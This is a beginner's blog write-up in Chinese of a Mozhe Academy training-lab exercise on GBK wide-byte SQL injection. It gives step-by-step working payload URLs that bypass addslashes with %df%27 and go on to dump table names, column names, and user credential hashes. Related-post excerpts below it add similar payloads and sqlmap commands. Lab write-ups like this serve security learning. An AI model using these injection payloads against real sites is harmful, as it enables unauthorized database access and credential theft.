墨者学院sql注入(宽字节注入)

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量593 收藏 1
点赞数 2
分类专栏: 在线靶场学习 文章标签: 安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45819911/article/details/107331348
版权

墨者学院sql注入(宽字节注入)

闲谈

刚毕业,非科班出身,网络安全小白一名,第一次写笔记记录下自己学习的点点滴滴,写的不好大佬勿喷。

0x00 判断注入点:

其实没有什么判断的,因为之前做的注入点都存在与下图界面,图1:
图1(存在注入的界面在维护通告那里)

因为题目提示是宽字节注入,所以可能会用到%df ,%e5%5c,%e9%8c%a6。
注入点存在于url:http://219.153.49.228:42636/new_list.php?id=1
判断是否存在注入,如图2:
图2(输入 %df%27报错)

0x01 原理解析:

构造payload如下:
http://219.153.49.228:42636/new_list.php?id=1%df%27%20or%20%271%27=%271
结果如下图3:
图3发现在url中每个 ’ 前都被插入转义符\,推测使用addslashes函数进行转义,addslashes()会在预定义字符前插入转义符号,预定义字符:单引号(’),双引号("),反斜杠(\), NULL。
而%df与转义字符%5c集合会被gbk编码为汉字‘運’,所以单引号%27逃逸。

0x02 构造payload:

Payload:
http://219.153.49.228:42636/new_list.php?id=1%df%27%20order%20by%205%23
判断字段。
http://219.153.49.228:42636/new_list.php?id=-1%df%27%20union%20select%201,2,3,4,5%23
判断回显字段,发现回显字段在3处,截图如下:
图4
http://219.153.49.228:42636/new_list.php?id=-1%df%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),4,5%23
爆表名(因为表明不只是一个,所以使用group_concat函数将表名拼接),截图如下:
图5
http://219.153.49.228:40038/new_list.php?id=-1%df%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x73746f726d67726f75705f6d656d626572),4,5%23
爆字段名(不要在意为啥端口不一样,因为出去吃个饭,靶场关了。。。。至于为什么是16进制来表示表名,因为引号被转义了,所以使用16进制,为什么不接着用%df,前文说过了%df%5c会被编码为汉字‘運’,那样就变成了:table_name=運’xxxxxxx運’,根本查询不到东西),截图如下:
图6
http://219.153.49.228:40038/new_list.php?id=-1%df%27%20union%20select%201,2,(select%20group_concat(name,password)%20from%20stormgroup_member),4,5%23
爆字段,截图如下:
在这里插入图片描述

图7
MD5加密的密码,emmm,解密,登录,美滋滋。

附录

宽字节原理-参考链接: https://blog.csdn.net/qq_29419013/article/details/81205291.

小小小小白1397654
关注
专栏目录
有趣的注入(宽字节注入
xiao白帽子学习之路
12-03 2698
ctf:有趣的注入 url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。) 截图: x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +...
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4361
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
sql注入宽字节注入墨者学院
qq_42383069的博客
05-03 729
sql注入宽字节注入 1.原理:当php开启魔术函数–magic_quotes_gpc函数时,单引号(’)  双引号(")  反斜线() 等字符都会加上反斜线。 eg:我们在id=1后面加上’ 会被自动转义为 /’ 所以导致我们输入的东西无法闭合,就不会当做代码执行,就无法产生SQL注入了。 2.绕过原理: (1)1,a,’ 均为一个字节 (2)汉字 均为三个字节 (3)希腊...
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
最新发布
qq_56035503的博客
07-26 775
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其的原理,在实战也不发现不了其的问题。
墨者学院宽字节注入
2301_77578012的博客
05-14 893
对于%df表示一个可以与后续进行拼接成文的字符(所以此项不唯一,只要符合上述宽字节注入的规则均可以)字段:id,title,content,time,litle,name,password,status。此处id=-1也是为了不让union语句前面逻辑执行,爆出错误便于查看所爆出的列是哪一个。所以开放一下思维:使用id=-2可不可以,或者是10086?--打开靶场我们发现首页并没有明显注入点,我们开始寻找其他的点进行注入。只要没有实际对应的id=参数的页面均可以!执行发现,出现未知列数,缩小范围为5。
墨者学院SQL注入漏洞测试(宽字节)
没事我溜达
03-17 1696
靶场地址:SQL注入漏洞测试(宽字节) 本章学习点为如何绕过单引号,和遇到魔术引号时该如何进行绕过。
墨者学院-----SQL注入漏洞测试(宽字节)
qq_43590351的博客
01-23 554
SQL注入漏洞测试(宽字节) python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs 宽字节的注入原理 ...
墨者学院SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 890
目录手工注入工具注入(转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5189
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院】SQL手动注入 靶场初体验
bianxia123456的博客
04-06 4915
step1: 判断注入 判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。 step2: 猜解列名数量 order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。 order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。 order by 默认升序,降序关键字DESC,即order by 字段名 DESC; 所以使用order by关键字就能够知道整个表一共有多少个列。 ...
墨者SQL注入漏洞测试(宽字节)
wswr的博客
03-10 755
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了 思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是宽字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’) 然后会发现报错,然后开始一步步注入咯 登入 找注入点通过查看页面源码(突然想到还有一种方法找注入页面,就是用F12然后去找跳转链接有没有存在注入页面,与本题无关QAQ) 然后就%df%27咯,发现注入点 order by 从1..
墨者学院-SQL注入漏洞测试(宽字节)
臭nana的博客
12-17 507
宽字节原理自己百度,这是推荐:http://www.zfsec.cn/2018/09/30/宽字节注入/ 先构造payload:%df' 报错,存在宽字节注入 然后加:%df' oder by 5--+或者%df' order by 5%23(#) 5不报错,6报错,所以只有6个字段,联合查询 id=-1%df' union select 1,2,3,4,5%23,发现3,5回显 id=-1%d...
墨者学院——入门SQL手工注入
Zichel77的博客
05-26 1363
关于SQL注入 SQL注入是一种注入攻击,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。 攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问...
墨者学院 SQL注入实战-MySQL
qq_38807738的博客
12-13 829
打开题目,发现url的id参数有一串base64,MQo=解码,得到1 ok,看来提交的参数都是需要经过base64转码的才行 根据题目,直接开始猜字段 id=1 order by 2正确,order by 3错误,判断有两个字段 使用联合注入 id=-1 union select 1,2 在1,2位置都有回显,id=-1 union select database(),2 判断数据库...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
qq_33598708的博客
04-21 2314
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 很神奇,公告正常显示,这表示什么?没有闭合可以直接注入。 开始注入: 判断字段数 /new_list.php?id=1 and 1=1 order by 5 页面是空白的就不截屏了。在5之前都是能正常查询出数据的,所以字段个数是4哈 现在利用联合查询来观察...
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1301
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
渗透学习—靶场篇—墨者学院SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 1900
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数的加密过程。。其还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
墨者学院PHP,墨者学院SQL注入解题
weixin_32541907的博客
03-22 126
一·判断注入输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。二·判断字段URL id=-1 order by 1URL id=-1 order by 2URL id=-1 order by 3URL id=-1 order by 4URL id=-1 order by 5 此时报错,说明有四个字段三·使用union查询注入点输入union select 1,2,3,4发现2,3...
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值